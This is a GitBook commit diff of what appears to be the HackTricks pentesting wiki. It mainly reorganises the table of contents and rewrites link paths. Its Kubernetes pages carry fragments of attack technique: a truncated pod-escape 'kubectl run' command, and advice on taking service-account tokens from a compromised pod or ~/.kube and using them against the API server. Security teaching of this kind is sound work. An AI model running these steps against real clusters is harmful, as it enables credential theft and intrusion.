GitBook: [#3161] No subject

This commit is contained in:
CPol 2022-05-01 15:53:26 +00:00 committed by gitbook-bot
parent edcb9a25c7
commit 070200605a
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
89 changed files with 298 additions and 305 deletions

View file

@ -78,8 +78,8 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
You can find **my reviews of the certifications eMAPT and eWPTXv2** (and their **respective preparation courses**) in the following page: You can find **my reviews of the certifications eMAPT and eWPTXv2** (and their **respective preparation courses**) in the following page:
{% content-ref url="courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md" %} {% content-ref url="external-platforms-reviews-writeups/ine-courses-and-elearnsecurity-certifications-reviews.md" %}
[ine-courses-and-elearnsecurity-certifications-reviews.md](courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md) [ine-courses-and-elearnsecurity-certifications-reviews.md](external-platforms-reviews-writeups/ine-courses-and-elearnsecurity-certifications-reviews.md)
{% endcontent-ref %} {% endcontent-ref %}
## License ## License

View file

@ -25,6 +25,37 @@
* [Clone a Website](generic-methodologies-and-resources/phishing-methodology/clone-a-website.md) * [Clone a Website](generic-methodologies-and-resources/phishing-methodology/clone-a-website.md)
* [Detecting Phising](generic-methodologies-and-resources/phishing-methodology/detecting-phising.md) * [Detecting Phising](generic-methodologies-and-resources/phishing-methodology/detecting-phising.md)
* [Phishing Documents](generic-methodologies-and-resources/phishing-methodology/phishing-documents.md) * [Phishing Documents](generic-methodologies-and-resources/phishing-methodology/phishing-documents.md)
* [Basic Forensic Methodology](generic-methodologies-and-resources/basic-forensic-methodology/README.md)
* [Baseline Monitoring](generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md)
* [Anti-Forensic Techniques](generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md)
* [Docker Forensics](generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md)
* [Image Adquisition & Mount](generic-methodologies-and-resources/basic-forensic-methodology/image-adquisition-and-mount.md)
* [Linux Forensics](generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md)
* [Malware Analysis](generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md)
* [Memory dump analysis](generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md)
* [Volatility - CheatSheet](generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md)
* [Partitions/File Systems/Carving](generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md)
* [EXT](generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/ext.md)
* [File/Data Carving & Recovery Tools](generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md)
* [NTFS](generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md)
* [Pcap Inspection](generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md)
* [DNSCat pcap analysis](generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md)
* [USB Keystrokes](generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md)
* [Wifi Pcap Analysis](generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md)
* [Wireshark tricks](generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md)
* [Specific Software/File-Type Tricks](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md)
* [Decompile compiled python binaries (exe, elf) - Retreive from .pyc](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
* [Browser Artifacts](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md)
* [Desofuscation vbs (cscript.exe)](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md)
* [Local Cloud Storage](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md)
* [Office file analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md)
* [PDF File analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md)
* [PNG tricks](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md)
* [Video and Audio file analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md)
* [ZIPs tricks](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md)
* [Windows Artifacts](generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md)
* [Windows Processes](generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/windows-processes.md)
* [Interesting Windows Registry Keys](generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md)
* [Brute Force - CheatSheet](generic-methodologies-and-resources/brute-force.md) * [Brute Force - CheatSheet](generic-methodologies-and-resources/brute-force.md)
* [Exfiltration](generic-methodologies-and-resources/exfiltration.md) * [Exfiltration](generic-methodologies-and-resources/exfiltration.md)
* [Tunneling and Port Forwarding](generic-methodologies-and-resources/tunneling-and-port-forwarding.md) * [Tunneling and Port Forwarding](generic-methodologies-and-resources/tunneling-and-port-forwarding.md)
@ -367,7 +398,7 @@
* [47808/udp - Pentesting BACNet](network-services-pentesting/47808-udp-bacnet.md) * [47808/udp - Pentesting BACNet](network-services-pentesting/47808-udp-bacnet.md)
* [50030,50060,50070,50075,50090 - Pentesting Hadoop](network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md) * [50030,50060,50070,50075,50090 - Pentesting Hadoop](network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md)
*** ## 🕸 Pentesting Web
* [Web Vulnerabilities Methodology](pentesting-web/web-vulnerabilities-methodology.md) * [Web Vulnerabilities Methodology](pentesting-web/web-vulnerabilities-methodology.md)
* [Reflecting Techniques - PoCs and Polygloths CheatSheet](pentesting-web/pocs-and-polygloths-cheatsheet/README.md) * [Reflecting Techniques - PoCs and Polygloths CheatSheet](pentesting-web/pocs-and-polygloths-cheatsheet/README.md)
@ -389,7 +420,7 @@
* [CRLF (%0D%0A) Injection](pentesting-web/crlf-0d-0a.md) * [CRLF (%0D%0A) Injection](pentesting-web/crlf-0d-0a.md)
* [Cross-site WebSocket hijacking (CSWSH)](pentesting-web/cross-site-websocket-hijacking-cswsh.md) * [Cross-site WebSocket hijacking (CSWSH)](pentesting-web/cross-site-websocket-hijacking-cswsh.md)
* [CSRF (Cross Site Request Forgery)](pentesting-web/csrf-cross-site-request-forgery.md) * [CSRF (Cross Site Request Forgery)](pentesting-web/csrf-cross-site-request-forgery.md)
* [Dangling Markup - HTML scriptless injection](pentesting-web/dangling-markup-html-scriptless-injection.md) * [Dangling Markup - HTML scriptless injection](pentesting-web/dangling-markup-html-scriptless-injection/README.md)
* [HTML Injection / Char-by-char Exfiltration](pentesting-web/dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/README.md) * [HTML Injection / Char-by-char Exfiltration](pentesting-web/dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/README.md)
* [CSS Injection Code](pentesting-web/dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/css-injection-code.md) * [CSS Injection Code](pentesting-web/dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/css-injection-code.md)
* [Deserialization](pentesting-web/deserialization/README.md) * [Deserialization](pentesting-web/deserialization/README.md)
@ -423,10 +454,10 @@
* [hop-by-hop headers](pentesting-web/abusing-hop-by-hop-headers.md) * [hop-by-hop headers](pentesting-web/abusing-hop-by-hop-headers.md)
* [IDOR](pentesting-web/idor.md) * [IDOR](pentesting-web/idor.md)
* [JWT Vulnerabilities (Json Web Tokens)](pentesting-web/hacking-jwt-json-web-tokens.md) * [JWT Vulnerabilities (Json Web Tokens)](pentesting-web/hacking-jwt-json-web-tokens.md)
* [NoSQL injection](pentesting-web/nosql-injection.md)
* [LDAP Injection](pentesting-web/ldap-injection.md) * [LDAP Injection](pentesting-web/ldap-injection.md)
* [Login Bypass](pentesting-web/login-bypass/README.md) * [Login Bypass](pentesting-web/login-bypass/README.md)
* [Login bypass List](pentesting-web/login-bypass/sql-login-bypass.md) * [Login bypass List](pentesting-web/login-bypass/sql-login-bypass.md)
* [NoSQL injection](pentesting-web/nosql-injection.md)
* [OAuth to Account takeover](pentesting-web/oauth-to-account-takeover.md) * [OAuth to Account takeover](pentesting-web/oauth-to-account-takeover.md)
* [Open Redirect](pentesting-web/open-redirect.md) * [Open Redirect](pentesting-web/open-redirect.md)
* [Parameter Pollution](pentesting-web/parameter-pollution.md) * [Parameter Pollution](pentesting-web/parameter-pollution.md)
@ -475,37 +506,10 @@
* [Steal Info JS](pentesting-web/xss-cross-site-scripting/steal-info-js.md) * [Steal Info JS](pentesting-web/xss-cross-site-scripting/steal-info-js.md)
* [XSSI (Cross-Site Script Inclusion)](pentesting-web/xssi-cross-site-script-inclusion.md) * [XSSI (Cross-Site Script Inclusion)](pentesting-web/xssi-cross-site-script-inclusion.md)
* [XS-Search](pentesting-web/xs-search.md) * [XS-Search](pentesting-web/xs-search.md)
* [Basic Forensic Methodology](forensics/basic-forensic-methodology/README.md)
* [Baseline Monitoring](forensics/basic-forensic-methodology/file-integrity-monitoring.md) ## ⛈ Cloud Security
* [Anti-Forensic Techniques](forensics/basic-forensic-methodology/anti-forensic-techniques.md)
* [Docker Forensics](forensics/basic-forensic-methodology/docker-forensics.md) * [Cloud Security](cloud-security/cloud-security.md)
* [Image Adquisition & Mount](forensics/basic-forensic-methodology/image-adquisition-and-mount.md)
* [Linux Forensics](forensics/basic-forensic-methodology/linux-forensics.md)
* [Malware Analysis](forensics/basic-forensic-methodology/malware-analysis.md)
* [Memory dump analysis](forensics/basic-forensic-methodology/memory-dump-analysis/README.md)
* [Volatility - CheatSheet](forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md)
* [Partitions/File Systems/Carving](forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md)
* [EXT](forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md)
* [File/Data Carving & Recovery Tools](forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md)
* [NTFS](forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md)
* [Pcap Inspection](forensics/basic-forensic-methodology/pcap-inspection/README.md)
* [DNSCat pcap analysis](forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md)
* [USB Keystrokes](forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md)
* [Wifi Pcap Analysis](forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md)
* [Wireshark tricks](forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md)
* [Specific Software/File-Type Tricks](forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md)
* [Decompile compiled python binaries (exe, elf) - Retreive from .pyc](forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
* [Browser Artifacts](forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md)
* [Desofuscation vbs (cscript.exe)](forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md)
* [Local Cloud Storage](forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md)
* [Office file analysis](forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md)
* [PDF File analysis](forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md)
* [PNG tricks](forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md)
* [Video and Audio file analysis](forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md)
* [ZIPs tricks](forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md)
* [Windows Artifacts](forensics/basic-forensic-methodology/windows-forensics/README.md)
* [Windows Processes](forensics/basic-forensic-methodology/windows-forensics/windows-processes.md)
* [Interesting Windows Registry Keys](forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md)
* [GCP Security](cloud-security/gcp-security/README.md) * [GCP Security](cloud-security/gcp-security/README.md)
* [GCP - Other Services Enumeration](cloud-security/gcp-security/gcp-looting.md) * [GCP - Other Services Enumeration](cloud-security/gcp-security/gcp-looting.md)
* [GCP - Abuse GCP Permissions](cloud-security/gcp-security/gcp-interesting-permissions/README.md) * [GCP - Abuse GCP Permissions](cloud-security/gcp-security/gcp-interesting-permissions/README.md)
@ -525,22 +529,22 @@
* [Basic Github Information](cloud-security/github-security/basic-github-information.md) * [Basic Github Information](cloud-security/github-security/basic-github-information.md)
* [Gitea Security](cloud-security/gitea-security/README.md) * [Gitea Security](cloud-security/gitea-security/README.md)
* [Basic Gitea Information](cloud-security/gitea-security/basic-gitea-information.md) * [Basic Gitea Information](cloud-security/gitea-security/basic-gitea-information.md)
* [Kubernetes Security](pentesting/pentesting-kubernetes/README.md) * [Kubernetes Security](cloud-security/pentesting-kubernetes/README.md)
* [Kubernetes Basics](pentesting/pentesting-kubernetes/kubernetes-basics.md) * [Kubernetes Basics](cloud-security/pentesting-kubernetes/kubernetes-basics.md)
* [Pentesting Kubernetes Services](pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md) * [Pentesting Kubernetes Services](cloud-security/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md)
* [Exposing Services in Kubernetes](pentesting/pentesting-kubernetes/exposing-services-in-kubernetes.md) * [Exposing Services in Kubernetes](cloud-security/pentesting-kubernetes/exposing-services-in-kubernetes.md)
* [Attacking Kubernetes from inside a Pod](pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md) * [Attacking Kubernetes from inside a Pod](cloud-security/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md)
* [Kubernetes Enumeration](cloud-security/pentesting-kubernetes/kubernetes-enumeration.md) * [Kubernetes Enumeration](cloud-security/pentesting-kubernetes/kubernetes-enumeration.md)
* [Kubernetes Role-Based Access Control (RBAC)](pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md) * [Kubernetes Role-Based Access Control (RBAC)](cloud-security/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md)
* [Abusing Roles/ClusterRoles in Kubernetes](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md) * [Abusing Roles/ClusterRoles in Kubernetes](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md)
* [K8s Roles Abuse Lab](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/k8s-roles-abuse-lab.md) * [K8s Roles Abuse Lab](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/k8s-roles-abuse-lab.md)
* [Pod Escape Privileges](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md) * [Pod Escape Privileges](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md)
* [Kubernetes Namespace Escalation](cloud-security/pentesting-kubernetes/namespace-escalation.md) * [Kubernetes Namespace Escalation](cloud-security/pentesting-kubernetes/namespace-escalation.md)
* [Kubernetes Access to other Clouds](cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md) * [Kubernetes Access to other Clouds](cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md)
* [Kubernetes Hardening](pentesting/pentesting-kubernetes/kubernetes-hardening/README.md) * [Kubernetes Hardening](cloud-security/pentesting-kubernetes/kubernetes-hardening/README.md)
* [Monitoring with Falco](pentesting/pentesting-kubernetes/kubernetes-hardening/monitoring-with-falco.md) * [Monitoring with Falco](cloud-security/pentesting-kubernetes/kubernetes-hardening/monitoring-with-falco.md)
* [Kubernetes SecurityContext(s)](pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md) * [Kubernetes SecurityContext(s)](cloud-security/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md)
* [Kubernetes NetworkPolicies](pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md) * [Kubernetes NetworkPolicies](cloud-security/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md)
* [Kubernetes Network Attacks](cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md) * [Kubernetes Network Attacks](cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md)
* [Concourse](cloud-security/concourse/README.md) * [Concourse](cloud-security/concourse/README.md)
* [Concourse Architecture](cloud-security/concourse/concourse-architecture.md) * [Concourse Architecture](cloud-security/concourse/concourse-architecture.md)
@ -554,43 +558,56 @@
* [Atlantis](cloud-security/atlantis.md) * [Atlantis](cloud-security/atlantis.md)
* [Cloud Security Review](cloud-security/cloud-security-review.md) * [Cloud Security Review](cloud-security/cloud-security-review.md)
* [AWS Security](cloud-security/aws-security.md) * [AWS Security](cloud-security/aws-security.md)
* [BRA.I.NSMASHER Presentation](a.i.-exploiting/bra.i.nsmasher-presentation/README.md)
* [Basic Bruteforcer](a.i.-exploiting/bra.i.nsmasher-presentation/basic-bruteforcer.md) ## 😎 Hardware/Physical Access
* [Basic Captcha Breaker](a.i.-exploiting/bra.i.nsmasher-presentation/basic-captcha-breaker.md)
* [BIM Bruteforcer](a.i.-exploiting/bra.i.nsmasher-presentation/bim-bruteforcer.md) * [Physical Attacks](hardware-physical-access/physical-attacks.md)
* [Hybrid Malware Classifier Part 1](a.i.-exploiting/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md) * [Escaping from KIOSKs](hardware-physical-access/escaping-from-gui-applications/README.md)
* [ML Basics](a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/README.md) * [Show file extensions](hardware-physical-access/escaping-from-gui-applications/show-file-extensions.md)
* [Feature Engineering](a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md) * [Firmware Analysis](hardware-physical-access/firmware-analysis/README.md)
* [Bootloader testing](hardware-physical-access/firmware-analysis/bootloader-testing.md)
* [Firmware Integrity](hardware-physical-access/firmware-analysis/firmware-integrity.md)
## 🧐 External Platforms Reviews/Writeups
* [BRA.I.NSMASHER Presentation](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/README.md)
* [Basic Bruteforcer](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/basic-bruteforcer.md)
* [Basic Captcha Breaker](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/basic-captcha-breaker.md)
* [BIM Bruteforcer](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/bim-bruteforcer.md)
* [Hybrid Malware Classifier Part 1](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md)
* [ML Basics](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/ml-basics/README.md)
* [Feature Engineering](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md)
* [INE Courses and eLearnSecurity Certifications Reviews](external-platforms-reviews-writeups/ine-courses-and-elearnsecurity-certifications-reviews.md)
## Group 1
* [Reversing & Exploiting](group-1/reversing-and-exploiting.md)
* [Reversing Tools & Basic Methods](group-1/reversing-tools-basic-methods/README.md)
* [Angr](group-1/reversing-tools-basic-methods/angr/README.md)
* [Angr - Examples](group-1/reversing-tools-basic-methods/angr/angr-examples.md)
* [Z3 - Satisfiability Modulo Theories (SMT)](group-1/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md)
* [Cheat Engine](group-1/reversing-tools-basic-methods/cheat-engine.md)
* [Blobrunner](group-1/reversing-tools-basic-methods/blobrunner.md)
* [Common API used in Malware](group-1/common-api-used-in-malware.md)
* [Linux Exploiting (Basic) (SPA)](group-1/linux-exploiting-basic-esp/README.md)
* [Format Strings Template](group-1/linux-exploiting-basic-esp/format-strings-template.md)
* [ROP - call sys\_execve](group-1/linux-exploiting-basic-esp/rop-syscall-execv.md)
* [ROP - Leaking LIBC address](group-1/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md)
* [ROP - Leaking LIBC template](group-1/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md)
* [Bypassing Canary & PIE](group-1/linux-exploiting-basic-esp/bypassing-canary-and-pie.md)
* [Ret2Lib](group-1/linux-exploiting-basic-esp/ret2lib.md)
* [Fusion](group-1/linux-exploiting-basic-esp/fusion.md)
* [Exploiting Tools](group-1/tools/README.md)
* [PwnTools](group-1/tools/pwntools.md)
* [Windows Exploiting (Basic Guide - OSCP lvl)](group-1/windows-exploiting-basic-guide-oscp-lvl.md)
***
* [Blockchain & Crypto Currencies](blockchain/blockchain-and-crypto-currencies/README.md) * [Blockchain & Crypto Currencies](blockchain/blockchain-and-crypto-currencies/README.md)
* [Page 1](blockchain/blockchain-and-crypto-currencies/page-1.md) * [Page 1](blockchain/blockchain-and-crypto-currencies/page-1.md)
* [INE Courses and eLearnSecurity Certifications Reviews](courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md)
* [Physical Attacks](physical-attacks/physical-attacks.md)
* [Escaping from KIOSKs](physical-attacks/escaping-from-gui-applications/README.md)
* [Show file extensions](physical-attacks/escaping-from-gui-applications/show-file-extensions.md)
* [Firmware Analysis](physical-attacks/firmware-analysis/README.md)
* [Bootloader testing](physical-attacks/firmware-analysis/bootloader-testing.md)
* [Firmware Integrity](physical-attacks/firmware-analysis/firmware-integrity.md)
* [Reversing Tools & Basic Methods](reversing/reversing-tools-basic-methods/README.md)
* [Angr](reversing/reversing-tools-basic-methods/angr/README.md)
* [Angr - Examples](reversing/reversing-tools-basic-methods/angr/angr-examples.md)
* [Z3 - Satisfiability Modulo Theories (SMT)](reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md)
* [Cheat Engine](reversing/reversing-tools-basic-methods/cheat-engine.md)
* [Blobrunner](reversing/reversing-tools-basic-methods/blobrunner.md)
* [Common API used in Malware](reversing/common-api-used-in-malware.md)
* [Cryptographic/Compression Algorithms](reversing/cryptographic-algorithms/README.md) * [Cryptographic/Compression Algorithms](reversing/cryptographic-algorithms/README.md)
* [Unpacking binaries](reversing/cryptographic-algorithms/unpacking-binaries.md) * [Unpacking binaries](reversing/cryptographic-algorithms/unpacking-binaries.md)
* [Word Macros](reversing/word-macros.md) * [Word Macros](reversing/word-macros.md)
* [Linux Exploiting (Basic) (SPA)](exploiting/linux-exploiting-basic-esp/README.md)
* [Format Strings Template](exploiting/linux-exploiting-basic-esp/format-strings-template.md)
* [ROP - call sys\_execve](exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md)
* [ROP - Leaking LIBC address](exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md)
* [ROP - Leaking LIBC template](exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md)
* [Bypassing Canary & PIE](exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md)
* [Ret2Lib](exploiting/linux-exploiting-basic-esp/ret2lib.md)
* [Fusion](exploiting/linux-exploiting-basic-esp/fusion.md)
* [Exploiting Tools](exploiting/tools/README.md)
* [PwnTools](exploiting/tools/pwntools.md)
* [Windows Exploiting (Basic Guide - OSCP lvl)](exploiting/windows-exploiting-basic-guide-oscp-lvl.md)
* [Certificates](cryptography/certificates.md) * [Certificates](cryptography/certificates.md)
* [Cipher Block Chaining CBC-MAC](cryptography/cipher-block-chaining-cbc-mac-priv.md) * [Cipher Block Chaining CBC-MAC](cryptography/cipher-block-chaining-cbc-mac-priv.md)
* [Crypto CTFs Tricks](cryptography/crypto-ctfs-tricks.md) * [Crypto CTFs Tricks](cryptography/crypto-ctfs-tricks.md)

View file

@ -0,0 +1,2 @@
# Cloud Security

View file

@ -163,8 +163,8 @@ kubectl run r00t --restart=Never -ti --rm --image lol --overrides '{"spec":{"hos
Now that you can escape to the node check post-exploitation techniques in: Now that you can escape to the node check post-exploitation techniques in:
{% content-ref url="../../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md" %} {% content-ref url="../attacking-kubernetes-from-inside-a-pod.md" %}
[attacking-kubernetes-from-inside-a-pod.md](../../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md) [attacking-kubernetes-from-inside-a-pod.md](../attacking-kubernetes-from-inside-a-pod.md)
{% endcontent-ref %} {% endcontent-ref %}
#### Stealth #### Stealth

View file

@ -1,4 +1,4 @@
# Kubernetes Enumeration
<details> <details>
@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
## Kubernetes Tokens
# Kubernetes Tokens
If you have compromised access to a machine the user may have access to some Kubernetes platform. The token is usually located in a file pointed by the **env var `KUBECONFIG`** or **inside `~/.kube`**. If you have compromised access to a machine the user may have access to some Kubernetes platform. The token is usually located in a file pointed by the **env var `KUBECONFIG`** or **inside `~/.kube`**.
@ -25,9 +24,9 @@ In this folder you might find config files with **tokens and configurations to c
If you have compromised a pod inside a kubernetes environment, there are other places where you can find tokens and information about the current K8 env: If you have compromised a pod inside a kubernetes environment, there are other places where you can find tokens and information about the current K8 env:
## Service Account Tokens ### Service Account Tokens
Before continuing, if you don't know what is a service in Kubernetes I would suggest you to [**follow this link and read at least the information about Kubernetes architecture**](../../pentesting/pentesting-kubernetes/#architecture)**.** Before continuing, if you don't know what is a service in Kubernetes I would suggest you to [**follow this link and read at least the information about Kubernetes architecture**](./#architecture)**.**
Taken from the Kubernetes [documentation](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/#use-the-default-service-account-to-access-the-api-server): Taken from the Kubernetes [documentation](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/#use-the-default-service-account-to-access-the-api-server):
@ -60,15 +59,15 @@ Default location on **Minikube**:
* /var/lib/localkube/certs * /var/lib/localkube/certs
## Hot Pods ### Hot Pods
_**Hot pods are**_ pods containing a privileged service account token. A privileged service account token is a token that has permission to do privileged tasks such as listing secrets, creating pods, etc. _**Hot pods are**_ pods containing a privileged service account token. A privileged service account token is a token that has permission to do privileged tasks such as listing secrets, creating pods, etc.
# RBAC ## RBAC
If you don't know what is **RBAC**, [**read this section**](../../pentesting/pentesting-kubernetes/#cluster-hardening-rbac). If you don't know what is **RBAC**, [**read this section**](./#cluster-hardening-rbac).
# Enumeration CheatSheet ## Enumeration CheatSheet
In order to enumerate a K8s environment you need a couple of this: In order to enumerate a K8s environment you need a couple of this:
@ -80,7 +79,7 @@ With those details you can **enumerate kubernetes**. If the **API** for some rea
However, usually the **API server is inside an internal network**, therefore you will need to **create a tunnel** through the compromised machine to access it from your machine, or you can **upload the** [**kubectl**](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) binary, or use **`curl/wget/anything`** to perform raw HTTP requests to the API server. However, usually the **API server is inside an internal network**, therefore you will need to **create a tunnel** through the compromised machine to access it from your machine, or you can **upload the** [**kubectl**](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) binary, or use **`curl/wget/anything`** to perform raw HTTP requests to the API server.
## Differences between `list` and `get` verbs ### Differences between `list` and `get` verbs
With **`get`** permissions you can access information of specific assets (_`describe` option in `kubectl`_) API: With **`get`** permissions you can access information of specific assets (_`describe` option in `kubectl`_) API:
@ -113,7 +112,7 @@ They open a streaming connection that returns you the full manifest of a Deploym
The following `kubectl` commands indicates just how to list the objects. If you want to access the data you need to use `describe` instead of `get` The following `kubectl` commands indicates just how to list the objects. If you want to access the data you need to use `describe` instead of `get`
{% endhint %} {% endhint %}
## Using curl ### Using curl
From inside a pod you can use several env variables: From inside a pod you can use several env variables:
@ -126,7 +125,7 @@ export CACERT=${SERVICEACCOUNT}/ca.crt
alias kurl="curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\"" alias kurl="curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\""
``` ```
## Using kubectl ### Using kubectl
Having the token and the address of the API server you use kubectl or curl to access it as indicated here: Having the token and the address of the API server you use kubectl or curl to access it as indicated here:
@ -138,7 +137,7 @@ You can find an [**official kubectl cheatsheet here**](https://kubernetes.io/doc
To find the HTTP request that `kubectl` sends you can use the parameter `-v=8` To find the HTTP request that `kubectl` sends you can use the parameter `-v=8`
## Current Configuration ### Current Configuration
{% tabs %} {% tabs %}
{% tab title="Kubectl" %} {% tab title="Kubectl" %}
@ -167,7 +166,7 @@ kubectl config set-credentials USER_NAME \
--auth-provider-arg=id-token=( your id_token ) --auth-provider-arg=id-token=( your id_token )
``` ```
## Get Supported Resources ### Get Supported Resources
With this info you will know all the services you can list With this info you will know all the services you can list
@ -180,7 +179,7 @@ k api-resources --namespaced=false #Resources NOT specific to a namespace
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
## Get Current Privileges ### Get Current Privileges
{% tabs %} {% tabs %}
{% tab title="kubectl" %} {% tab title="kubectl" %}
@ -205,8 +204,8 @@ kurl -i -s -k -X $'POST' \
You can learn more about **Kubernetes RBAC** in You can learn more about **Kubernetes RBAC** in
{% content-ref url="../../pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md" %} {% content-ref url="kubernetes-role-based-access-control-rbac.md" %}
